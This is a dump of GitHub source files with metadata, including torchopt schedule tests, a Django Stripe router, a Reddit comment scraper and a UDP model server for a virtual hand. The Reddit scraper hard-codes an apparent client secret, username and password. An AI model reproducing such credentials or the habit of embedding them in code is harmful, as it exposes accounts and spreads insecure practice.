ValueError(\"Unexpected response format from Kobold API\")\n\n    def __call__(self, prompt: str, stop: Optional[List[str]] = None) -> LLMResponse:\n        return self.get_response(prompt, stop)\n\n    @property\n    def _identifying_params(self) -> Mapping[str, Any]:\n        \"\"\"Get the identifying parameters.\"\"\"\n        return {}\n", "repo_name": "sizzles/meetup-llm", "sub_path": "completed/bot/llms/kobold_api_llm.py", "file_name": "kobold_api_llm.py", "file_ext": "py", "file_size_in_byte": 2604, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": 
"github-code", "pt": "86", "api": [{"api_name": "base_llm.BaseLLM", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 18, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 43, "usage_type": "call"}, {"api_name": "base_llm.LLMResponse", "line_number": 65, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 71, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 75, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "29370891098", "text": "from django.urls import path\n\nfrom stripe_app.views import (CancelledView, CreateCheckoutSession,\n ItemDetailView, StripeConfig, SuccessView)\n\nurlpatterns = [\n path('buy/<int:pk>/', CreateCheckoutSession.as_view(), name='buy'),\n path('config/', StripeConfig.as_view(), name='config'),\n path('success/', SuccessView.as_view(), name='success'),\n path('cancelled/', CancelledView.as_view(), name='cancelled'),\n path('item/<int:pk>/', ItemDetailView.as_view(), name='item'),\n]\n", "repo_name": "Balubalu27/stripe_task_django", "sub_path": "simple_stripe/stripe_app/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 517, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "stripe_app.views.CreateCheckoutSession.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "stripe_app.views.CreateCheckoutSession", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "stripe_app.views.StripeConfig.as_view", "line_number": 8, "usage_type": "call"}, {"api_name": "stripe_app.views.StripeConfig", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "stripe_app.views.SuccessView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "stripe_app.views.SuccessView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "stripe_app.views.CancelledView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "stripe_app.views.CancelledView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "stripe_app.views.ItemDetailView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "stripe_app.views.ItemDetailView", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "34114708729", "text": "from __future__ import annotations\n\nfrom typing import Any, Callable\n\nimport functorch\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nimport helpers\nimport torchopt\nfrom torchopt.alias.utils import _set_use_chain_flat\n\n\n@helpers.parametrize(\n init_value=[1.0, 1e-1],\n decay_rate=[1e-2, 1e-3],\n transition_begin=[1, 5],\n transition_steps=[10, 100],\n staircase=[False, True],\n end_value=[0.0, None, 8e-1],\n)\ndef test_exponential_decay(\n init_value: float,\n decay_rate: float,\n transition_begin: int,\n transition_steps: int | None,\n staircase: bool,\n end_value: float | None,\n) -> None:\n schedule = torchopt.schedule.exponential_decay(\n init_value=init_value,\n 
decay_rate=decay_rate,\n transition_steps=transition_steps,\n transition_begin=transition_begin,\n staircase=staircase,\n end_value=end_value,\n )\n if end_value is not None:\n clip_fn = max if decay_rate < 1.0 else min\n for i in range(transition_begin, transition_steps):\n lr = schedule(i)\n if staircase:\n lr_gt = init_value * (decay_rate ** np.floor((i - transition_begin) / transition_steps))\n else:\n lr_gt = init_value * (decay_rate ** ((i - transition_begin) / transition_steps))\n if end_value is not None:\n lr_gt = clip_fn(lr_gt, end_value)\n assert np.allclose(lr, lr_gt)\n\n\ndef test_linear_schedule() -> None:\n init_value = 1.0\n end_value = 0.0\n gap_value = init_value - end_value\n transition_steps = 10\n transition_begin = 1\n\n schedule = torchopt.schedule.linear_schedule(\n init_value=init_value,\n end_value=end_value,\n transition_steps=transition_steps,\n transition_begin=transition_begin,\n )\n for i in range(transition_begin, transition_steps):\n lr = schedule(i)\n lr_gt = init_value - gap_value * (i - transition_begin) / transition_steps\n assert np.allclose(lr, lr_gt)\n\n\n@helpers.parametrize(\n dtype=[torch.float64, torch.float32],\n lr=[1e-2, 1e-3],\n total_iters=[helpers.NUM_UPDATES, helpers.NUM_UPDATES * 2],\n optimizers=[\n (torchopt.sgd, torch.optim.SGD, {}),\n (torchopt.adam, torch.optim.Adam, {}),\n (torchopt.adamw, torch.optim.AdamW, {}),\n (torchopt.adagrad, torch.optim.Adagrad, {'eps': 1e-8}),\n (torchopt.rmsprop, torch.optim.RMSprop, {}),\n ],\n inplace=[True, False],\n weight_decay=[0.0, 1e-2],\n use_chain_flat=[True, False],\n)\ndef test_lr_linear_schedule(\n dtype: torch.dtype,\n lr: float,\n total_iters: int,\n optimizers: tuple[Callable, torch.optim.Optimizer, dict[str, Any]],\n inplace: bool,\n weight_decay: float,\n use_chain_flat: bool,\n) -> None:\n _set_use_chain_flat(use_chain_flat)\n\n model, model_ref, model_base, loader = helpers.get_models(device='cpu', dtype=dtype)\n\n torchopt_optimizer, torch_optimizer, optimizer_kwargs = optimizers\n\n fmodel, params, buffers = functorch.make_functional_with_buffers(model)\n optim = torchopt_optimizer(\n torchopt.schedule.linear_schedule(\n init_value=lr,\n end_value=0.1 * lr,\n transition_steps=total_iters,\n transition_begin=0,\n ),\n weight_decay=weight_decay,\n **optimizer_kwargs,\n )\n optim_state = optim.init(params)\n optim_ref = torch_optimizer(\n model_ref.parameters(),\n lr,\n weight_decay=weight_decay,\n **optimizer_kwargs,\n )\n torch_scheduler = torch.optim.lr_scheduler.LinearLR(\n optim_ref,\n start_factor=1.0,\n end_factor=0.1,\n total_iters=total_iters,\n )\n\n for xs, ys in loader:\n xs = xs.to(dtype=dtype)\n pred = fmodel(params, buffers, xs)\n pred_ref = model_ref(xs)\n loss = F.cross_entropy(pred, ys)\n loss_ref = F.cross_entropy(pred_ref, ys)\n\n grads = torch.autograd.grad(loss, params, allow_unused=True)\n updates, optim_state = optim.update(grads, optim_state, params=params, inplace=inplace)\n params = torchopt.apply_updates(params, updates, inplace=inplace)\n\n optim_ref.zero_grad()\n loss_ref.backward()\n optim_ref.step()\n torch_scheduler.step()\n\n helpers.assert_model_all_close((params, buffers), model_ref, model_base, dtype=dtype)\n _set_use_chain_flat(True)\n", "repo_name": "metaopt/torchopt", "sub_path": "tests/test_schedule.py", "file_name": "test_schedule.py", "file_ext": "py", "file_size_in_byte": 4371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 440, "dataset": "github-code", "pt": "86", "api": [{"api_name": 
"torchopt.schedule.exponential_decay", "line_number": 31, "usage_type": "call"}, {"api_name": "torchopt.schedule", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 49, "usage_type": "call"}, {"api_name": "helpers.parametrize", "line_number": 15, "usage_type": "call"}, {"api_name": "torchopt.schedule.linear_schedule", "line_number": 59, "usage_type": "call"}, {"api_name": "torchopt.schedule", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.dtype", "line_number": 87, "usage_type": "attribute"}, {"api_name": "typing.Callable", "line_number": 90, "usage_type": "name"}, {"api_name": "torch.optim", "line_number": 90, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 90, "usage_type": "name"}, {"api_name": "torchopt.alias.utils._set_use_chain_flat", "line_number": 95, "usage_type": "call"}, {"api_name": "helpers.get_models", "line_number": 97, "usage_type": "call"}, {"api_name": "functorch.make_functional_with_buffers", "line_number": 101, "usage_type": "call"}, {"api_name": "torchopt.schedule.linear_schedule", "line_number": 103, "usage_type": "call"}, {"api_name": "torchopt.schedule", "line_number": 103, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.LinearLR", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 130, "usage_type": "name"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 131, "usage_type": "name"}, {"api_name": "torch.autograd.grad", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 133, "usage_type": "attribute"}, {"api_name": "torchopt.apply_updates", "line_number": 135, "usage_type": "call"}, {"api_name": "helpers.assert_model_all_close", "line_number": 142, "usage_type": "call"}, {"api_name": "torchopt.alias.utils._set_use_chain_flat", "line_number": 143, "usage_type": "call"}, {"api_name": "helpers.parametrize", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.float64", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": "helpers.NUM_UPDATES", "line_number": 74, "usage_type": "attribute"}, {"api_name": "torchopt.sgd", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 76, "usage_type": "attribute"}, {"api_name": "torchopt.adam", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torchopt.adamw", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 78, "usage_type": "attribute"}, {"api_name": "torchopt.adagrad", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torchopt.rmsprop", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "24347200314", "text": "import csv\nimport praw\nimport json\n\n# Credentials to access the Reddit API\nreddit = 
praw.Reddit(client_id='vgr0He3IMlSqVA',\n client_secret='h0WAu-6F6cQsx3Ku0DcC9gtld24',\n user_agent='by /u/ExtractAccount',\n username='ExtractAccount',\n password='reddit12345')\n\n# Extract only 25 posts from the front page\ntopPosts = []\nfor submission in reddit.front.hot(limit=25):\n topPosts.append(submission)\n\n# Lists for comments and information about them\ndonaldComments = []\nauthorList = []\ncomment_ranking = []\n\n# Extract all comments from the front page submissions\nfor sub in topPosts:\n submission = reddit.submission(id=sub)\n submission.comments.replace_more(limit=0)\n for comment in submission.comments.list():\n strip_comment = comment.body.replace(\"\\n\\n\",\" \")\n strip_comment = strip_comment.replace(\"\\n\", \" \")\n if ' Donald ' in comment.body:\n if 'Glover' not in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n elif ' donald ' in comment.body:\n if 'Glover' not in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n elif 'Trump' in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n elif 'trump' in comment.body:\n try:\n authorList.append(comment.author.name)\n except AttributeError:\n authorList.append(\"N/A\")\n # author name was already appended in the try/except above\n donaldComments.append(strip_comment)\n comment_ranking.append(comment.score)\n\n# A list of indexes\nindex_list = []\nfor i in range(0,len(comment_ranking)):\n index_list.append(i)\n\n# Sort by ranking of each comment and allow the list of indexes to be changed according\n# to the rankings\ndef bubble_sort(items):\n for i in range(len(items)):\n for j in range(len(items)-1-i):\n if items[j] < items[j+1]:\n items[j], items[j+1] = items[j+1], items[j]\n index_list[j], index_list[j+1] = index_list[j+1], index_list[j]\n\nbubble_sort(comment_ranking)\n\n# Creates the JS comment file so the browser can present the comments\nwith open('../js/randomTrumpText.js','w+') as myfile:\n # Write a list for the comments\n myfile.write('text_list = [\\n')\n for item in donaldComments:\n holder = json.dumps(item)\n myfile.write(' ' + holder + ',\\n')\n myfile.write(' ];\\n\\n')\n # Write a list for the authors of each comment\n myfile.write('name_list = [\\n')\n for name in authorList:\n holder = json.dumps(name)\n myfile.write(' ' + holder + ',\\n')\n myfile.write(' ];\\n\\n')\n # Write the indexes of the highest rated comments\n myfile.write('rank_list = [\\n')\n for i in range(0,5):\n myfile.write(' ' + str(index_list[i]) + ',\\n')\n myfile.write(' ];\\n\\n')\n myfile.write('var amount = text_list.length;\\n')\n myfile.write('$(\\\"#numberofComments\\\").text(amount + \" Comments\");\\n\\n')\n for i in range(0,5):\n myfile.write('$(\"#comment' + str(i+1) + '\").text(text_list[rank_list[' + str(i) + ']]);\\n')\n myfile.write('\\n')\n for i in range(0,5):\n myfile.write('$(\"#author' + str(i+1) + '\").text(\"- /u/\" + name_list[rank_list[' + str(i) + ']]);\\n')\n myfile.write('\\n')\n myfile.write('var counter = 0\\n\\n')\n myfile.write('function replaceText(){\\n')\n myfile.write(' text = text_list[counter];\\n')\n myfile.write(' if(text.length > 80){\\n')\n myfile.write('')\n myfile.write(' 
trump_array = [\"Trump\",\"trump\",\"Donald\",\"donald\"];\\n')\n myfile.write(' for(var i=0; i < trump_array.length; i++){\\n')\n myfile.write(' index = text.indexOf(trump_array[i]);\\n')\n myfile.write(' if(index > -1){\\n')\n myfile.write(' if(index > 200){\\n')\n myfile.write(' text = text.substring(index - 200, index) + text.substring(index,index+206);\\n')\n myfile.write(' text = \"... \" + text + \" ...\";\\n')\n myfile.write(' }\\n')\n myfile.write(' else{\\n')\n myfile.write(' diff = 200 - index;\\n')\n myfile.write(' text = text.substring(0, index) + text.substring(index, index+206 + diff);\\n')\n myfile.write(' text = text + \" ...\";\\n')\n myfile.write(' }\\n')\n myfile.write(' }\\n')\n myfile.write(' }\\n')\n myfile.write(' }\\n')\n myfile.write(' $(\"#comment\").text(text + \" -/u/\" + name_list[counter]);\\n')\n myfile.write(' counter += 1;\\n')\n myfile.write(' if((counter % amount) == 0){\\n')\n myfile.write(' counter = 0;\\n')\n myfile.write(' }\\n')\n myfile.write('}\\n\\n')\n myfile.write('function reload(){\\n')\n myfile.write(' location.reload();\\n')\n myfile.write('}\\n\\n')\n myfile.write('replaceText();\\n')\n myfile.write('setInterval(replaceText,10000);\\n')\n myfile.write('setInterval(replaceText,600000);')\n", "repo_name": "jcisneros21/TopRedditWords", "sub_path": "Python/topComments.py", "file_name": "topComments.py", "file_ext": "py", "file_size_in_byte": 5217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "praw.Reddit", "line_number": 6, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "2529099949", "text": "from models.ClubMembers import Club, Athlete\nfrom base import Session, engine, Base\nfrom StravaScraper import StravaScraper\nfrom env import CLUB_IDS, STRAVA_WEB_USER, STRAVA_WEB_PWD, WEEK_OFFSET_RANGE\n\nBase.metadata.create_all(engine)\nsession = Session()\n\n\ndef sync_club_members():\n print(\"syncing club members\")\n\n scraper = StravaScraper(STRAVA_WEB_USER, STRAVA_WEB_PWD)\n scraper.login()\n\n for club_id in CLUB_IDS:\n club = session.query(Club).filter(Club.id == club_id).first()\n if not club:\n club = Club(club_id)\n session.add(club)\n\n for week_offset in range(0, WEEK_OFFSET_RANGE):\n athletes = scraper.get_club_leaderboard(club_id, week_offset=week_offset)\n update_athletes(club, athletes)\n\n session.commit()\n session.close()\n\n\ndef update_athletes(club, athletes):\n for a in athletes:\n athlete = session.query(Athlete).filter(Athlete.id == a[\"athlete_id\"]).first()\n\n if not athlete:\n athlete = Athlete(a[\"athlete_id\"], a[\"athlete_firstname\"], a[\"athlete_lastname\"])\n session.add(athlete)\n else:\n athlete.firstname = a[\"athlete_firstname\"]\n athlete.lastname = a[\"athlete_lastname\"]\n\n if athlete not in club.athletes:\n club.athletes.append(athlete)\n\n\nif __name__ == '__main__':\n sync_club_members()\n", "repo_name": "antipodos/xcentis-run", "sub_path": "sync_club_members.py", "file_name": "sync_club_members.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "base.Base.metadata.create_all", "line_number": 6, "usage_type": "call"}, {"api_name": "base.engine", "line_number": 6, "usage_type": "argument"}, {"api_name": "base.Base.metadata", "line_number": 6, "usage_type": "attribute"}, 
{"api_name": "base.Base", "line_number": 6, "usage_type": "name"}, {"api_name": "base.Session", "line_number": 7, "usage_type": "call"}, {"api_name": "StravaScraper.StravaScraper", "line_number": 13, "usage_type": "call"}, {"api_name": "env.STRAVA_WEB_USER", "line_number": 13, "usage_type": "argument"}, {"api_name": "env.STRAVA_WEB_PWD", "line_number": 13, "usage_type": "argument"}, {"api_name": "env.CLUB_IDS", "line_number": 16, "usage_type": "name"}, {"api_name": "models.ClubMembers.Club", "line_number": 17, "usage_type": "argument"}, {"api_name": "models.ClubMembers.Club.id", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.ClubMembers.Club", "line_number": 19, "usage_type": "call"}, {"api_name": "env.WEEK_OFFSET_RANGE", "line_number": 22, "usage_type": "argument"}, {"api_name": "models.ClubMembers.Athlete", "line_number": 32, "usage_type": "argument"}, {"api_name": "models.ClubMembers.Athlete.id", "line_number": 32, "usage_type": "attribute"}, {"api_name": "models.ClubMembers.Athlete", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "2750997993", "text": "\"\"\"\n [ModelConnectionServer.py]\n Program that hosts a UDP server to host the models.\n\"\"\"\n\nimport socket\nimport socketserver\nimport threading\nimport time\nfrom typing import Tuple\n\nimport numpy\nimport tensorflow\n\nfrom scripts import Log, Constants, Warnings, Parameters, General, InputConstraints\nfrom scripts.General import time_ms, dict_deepcopy\nfrom scripts.frontend.logic import SensorListener\n\n\nclass ThreadedPredictions(threading.Thread):\n def __init__(self, model, to_predict):\n threading.Thread.__init__(self)\n # Prediction variables\n self.model = model\n self.to_predict = to_predict\n\n # Thread variables\n self.result = None\n self.done = False\n self.start()\n\n def run(self) -> None:\n self.result = General.constraint_number_value(\n self.model(self.to_predict)[0][0].numpy(),\n Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL)\n self.done = True\n\n\nclass ModelServer(socketserver.UDPServer):\n\n def __init__(self, server_address=(Constants.MODEL_SERVER_HOST, Constants.MODEL_SERVER_PORT)):\n socketserver.UDPServer.__init__(self, server_address=server_address,\n RequestHandlerClass=socketserver.DatagramRequestHandler)\n self.request_queue_size = 1 # Max queue size for requests\n\n # Server thread variables\n self._running = False\n self._serve_thread = None\n\n # Model logic variables\n self._models = []\n self._sensor_listener = None\n self._prediction_time = None\n self._progress_bar = None\n Log.info(\"Created a Model Server Request Handler.\")\n\n # Server running methods\n def serve_forever(self, poll_interval: float = ...) -> None:\n self._running = True\n self._serve_thread = threading.Thread(target=super().serve_forever)\n self._serve_thread.setName(\"Server Model Thread\")\n self._serve_thread.start()\n\n def shutdown(self) -> None:\n self._running = False\n super().shutdown()\n\n def is_running(self):\n return self._running\n\n # Method logic methods\n def zero_sensors(self):\n assert self._sensor_listener is not None\n self._sensor_listener.zero_sensor_readings()\n\n def connect_model(self, models_dir_path, progress_bar):\n \"\"\"\n Loads the models and starts the server\n :param model_id:\n :return:\n \"\"\"\n # Setting the progress bar\n self._progress_bar = progress_bar\n\n # Starts the sensor reader\n progress_bar.add_count(1)\n progress_bar.set_metric_text(\" Server & Hand Controller. 
Status: Starting the sensor listener...\")\n\n try:\n self._sensor_listener = SensorListener.SensorReadingsListener()\n self._sensor_listener.start_running()\n self._sensor_listener.start_reading()\n self._sensor_listener.start()\n except:\n self._sensor_listener = None\n InputConstraints.warn(\n \"Warning, was not able to establish communications with COM3 port.\\n\" +\n \"Please ensure that the sensor reading device is connected.\")\n return False\n\n Log.info(\"Connecting to a model.\")\n\n progress_bar.add_count(1)\n progress_bar.set_metric_text(\" Server. Status: Connecting client to Unity...\")\n\n # Loads in the models\n progress_bar.set_metric_text(\" Server. Status: Loading the limb models...\")\n\n self._models = []\n for finger_index in range(0, Constants.NUM_FINGERS):\n self._models.append([])\n for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n self._models[finger_index].append(tensorflow.keras.models.load_model(\n models_dir_path + \"f-\" + str(finger_index) + \"_l-\" + str(limb_index) + \".mod\",\n custom_objects=None, compile=True, options=None\n ))\n progress_bar.add_count(1)\n\n # Running the server\n progress_bar.add_count(1)\n progress_bar.set_metric_text(\" Server & Hand Controller. Status: Running...\")\n return True\n\n def disconnect_model(self):\n \"\"\"\n Disconnects and stops the server.\n :return:\n \"\"\"\n\n # Stops the sensor listener\n self._sensor_listener.stop_reading()\n self._sensor_listener.stop_running()\n self._sensor_listener = None\n\n # Stops the server\n Log.info(\"Disconnecting from a model.\")\n return True\n\n # finish_request handles the request (runs the inputs by the model)\n def finish_request(self, request: bytes, client_address: Tuple[str, int]) -> None:\n\n if (self._sensor_listener is None):\n Log.error(\"'self._sensor_listener' is 'None' when executing 'finish_request'.\")\n\n # Obtains limb data from the C# Unity script\n # IMPORTANT: Convention assumes the format \"angl1 vel1 angl2 vel2 ... 
angl15 vel15\"\n string_limb_data = request[0].decode().split(\" \")\n limb_data = []\n for i in range(0, len(string_limb_data)):\n limb_data.append(\n General.constraint_number_value(float(string_limb_data[i]),\n Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL)\n )\n # if i % 2 == 1:\n # # TODO, this is currently multiplying the velocity by the FPS, why?\n # limb_data[i] = limb_data[i] * FRAMES_PER_SECOND\n\n # Obtains the sensors data\n current_sensor_data = self._sensor_listener.get_readings_frame() # Retrieves the sensors dictionary\n sensors_data = []\n for k in self._sensor_listener.get_key_list():\n sensors_data.append(\n General.constraint_number_value(\n current_sensor_data[k], Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL)\n )\n\n # Creates the features list\n features = numpy.array(limb_data + sensors_data)\n\n # Computes the velocities that the virtual hand limbs should acquire # TODO, multithread the prediction\n # threaded_predictions = []\n next_velocities = []\n for finger_index in range(0, Constants.NUM_FINGERS):\n # threaded_predictions.append([])\n for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n # threaded_predictions[finger_index].append([])\n\n # Prediction\n to_predict = features.reshape(1, Constants.NUM_FEATURES)\n # threaded_predictions[finger_index][limb_index] = ThreadedPredictions(\n # self._models[finger_index][limb_index], to_predict)\n\n next_velocities.append(General.constraint_number_value(\n self._models[finger_index][limb_index](to_predict)[0][0].numpy(),\n Constants.MODEL_MIN_VAL, Constants.MODEL_MAX_VAL))\n\n # # Wait (and polls) until all threaded prediction tasks are complete\n # is_done = False\n # while is_done is False:\n # is_done = True\n # for finger_index in range(0, Constants.NUM_FINGERS):\n # for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n # is_done &= threaded_predictions[finger_index][limb_index].done\n #\n # # Adds the velocity data\n # for finger_index in range(0, Constants.NUM_FINGERS):\n # for limb_index in range(0, Constants.NUM_LIMBS_PER_FINGER):\n # next_velocities.append(threaded_predictions[finger_index][limb_index].result)\n\n # Prepared the velocities to send to the unity script\n string_velocities = \"\"\n for i in range(0, Constants.NUM_LIMBS_PER_FINGER * Constants.NUM_FINGERS):\n string_velocities += str(next_velocities[i]) + \" \"\n string_velocities = string_velocities.rstrip(\" \")\n\n super().finish_request(request=request, client_address=client_address)\n\n # Sends the torques to the unity script\n # Returns the value to the client\n client_request_socket, client_request_address = self.get_request()[0][1], self.get_request()[1]\n client_request_socket.sendto(string_velocities.encode(), client_request_address)\n\n # Displays the amount of time it has taken to predict to the progress bar\n if self._progress_bar is not None:\n if self._prediction_time is not None:\n self._progress_bar.set_metric_text(\n \" Server & Hand Controller. 
Status: Running...\"\n \" Time since last prediction: \" + str(General.time_ms() - self._prediction_time) + \" ms\")\n self._prediction_time = General.time_ms()\n", "repo_name": "MichaelLapshin/Virtual-Hand-Application", "sub_path": "scripts/frontend/Logic/ModelConnectionServer.py", "file_name": "ModelConnectionServer.py", "file_ext": "py", "file_size_in_byte": 8743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "threading.Thread", "line_number": 20, "usage_type": "attribute"}, {"api_name": "threading.Thread.__init__", "line_number": 22, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 22, "usage_type": "attribute"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 33, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 33, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 35, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 35, "usage_type": "attribute"}, {"api_name": "socketserver.UDPServer", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scripts.Constants.MODEL_SERVER_HOST", "line_number": 41, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 41, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_SERVER_PORT", "line_number": 41, "usage_type": "attribute"}, {"api_name": "socketserver.UDPServer.__init__", "line_number": 42, "usage_type": "call"}, {"api_name": "socketserver.UDPServer", "line_number": 42, "usage_type": "attribute"}, {"api_name": "socketserver.DatagramRequestHandler", "line_number": 43, "usage_type": "attribute"}, {"api_name": "scripts.Log.info", "line_number": 55, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 55, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 60, "usage_type": "call"}, {"api_name": "scripts.frontend.logic.SensorListener.SensorReadingsListener", "line_number": 90, "usage_type": "call"}, {"api_name": "scripts.frontend.logic.SensorListener", "line_number": 90, "usage_type": "name"}, {"api_name": "scripts.InputConstraints.warn", "line_number": 96, "usage_type": "call"}, {"api_name": "scripts.InputConstraints", "line_number": 96, "usage_type": "name"}, {"api_name": "scripts.Log.info", "line_number": 101, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 101, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_FINGERS", "line_number": 110, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 110, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_LIMBS_PER_FINGER", "line_number": 112, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 112, "usage_type": "name"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 113, "usage_type": "attribute"}, {"api_name": "scripts.Log.info", "line_number": 136, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 136, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 140, "usage_type": "name"}, {"api_name": "scripts.Log.error", "line_number": 143, "usage_type": "call"}, {"api_name": "scripts.Log", "line_number": 143, "usage_type": "name"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 151, "usage_type": "call"}, 
{"api_name": "scripts.General", "line_number": 151, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 152, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 163, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 163, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 164, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 164, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 168, "usage_type": "call"}, {"api_name": "scripts.Constants.NUM_FINGERS", "line_number": 173, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 173, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_LIMBS_PER_FINGER", "line_number": 175, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 175, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_FEATURES", "line_number": 179, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 179, "usage_type": "name"}, {"api_name": "scripts.General.constraint_number_value", "line_number": 183, "usage_type": "call"}, {"api_name": "scripts.General", "line_number": 183, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MIN_VAL", "line_number": 185, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 185, "usage_type": "name"}, {"api_name": "scripts.Constants.MODEL_MAX_VAL", "line_number": 185, "usage_type": "attribute"}, {"api_name": "scripts.Constants.NUM_LIMBS_PER_FINGER", "line_number": 202, "usage_type": "attribute"}, {"api_name": "scripts.Constants", "line_number": 202, "usage_type": "name"}, {"api_name": "scripts.Constants.NUM_FINGERS", "line_number": 202, "usage_type": "attribute"}, {"api_name": "scripts.General.time_ms", "line_number": 218, "usage_type": "call"}, 